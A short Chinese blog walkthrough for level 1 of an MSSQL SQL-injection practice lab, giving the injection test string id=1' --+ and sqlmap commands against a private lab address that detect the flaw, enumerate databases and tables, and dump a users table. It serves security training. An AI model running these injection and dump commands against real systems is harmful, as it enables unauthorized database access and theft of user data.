MSSQL 工具注入(第一关)

简介

SQL注入是一种安全漏洞,通过它可以执行意外的SQL命令或访问数据库中的信息。MSSQL注入通常发生在应用程序将用户输入作为SQL查询的一部分执行时,而没有对输入进行适当的验证或清理。

以下是MSSQL手工注入的流程:

一、打开靶场选择第一关

二、确定注入点

测试不同的闭合方式

这里确定为 id=1' --+

三、查找是否存在 sql 漏洞

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 ,在kali在输入语句,确定存在 sql 漏洞

四、查找库名

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 --dbs --batch

五、查找表名

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test --tables --batch

六、得到表中的数据

使用语句 sqlmap -u http://192.168.213.200/less-1.asp?id=1 -D test -T users --dump --batch

安全

网络安全靠人民,网络安全为人民

相关推荐
醇氧5 分钟前
第一、二、三范式学习
数据库·学习·oracle
2401_8846621012 分钟前
MySQL安全加固十大硬核操作大纲
数据库·mysql·安全
PyAIGCMaster12 分钟前
开发了一个全自动接入wordpress的saas发文章的网站,记录一下如何实现,有需要的朋友联系。
java·开发语言·数据库
2201_7610801913 分钟前
Python上下文管理器(with语句)的原理与实践
jvm·数据库·python
謓泽28 分钟前
【MODBUS】串口 RTU / Modbus TCP / 透明就绪
网络·串口·modbus
Maverick0636 分钟前
Oracle PDB 概念与架构
运维·数据库·oracle
新猿一马38 分钟前
服务端安全开发注意事项
数据库·web安全·oracle
budingxiaomoli39 分钟前
数据链路层&&应用层知识总结
网络
bigcarp43 分钟前
Roundcube Webmail + sqlite
数据库·sqlite
m0_662577971 小时前
自动化机器学习(AutoML)库TPOT使用指南
jvm·数据库·python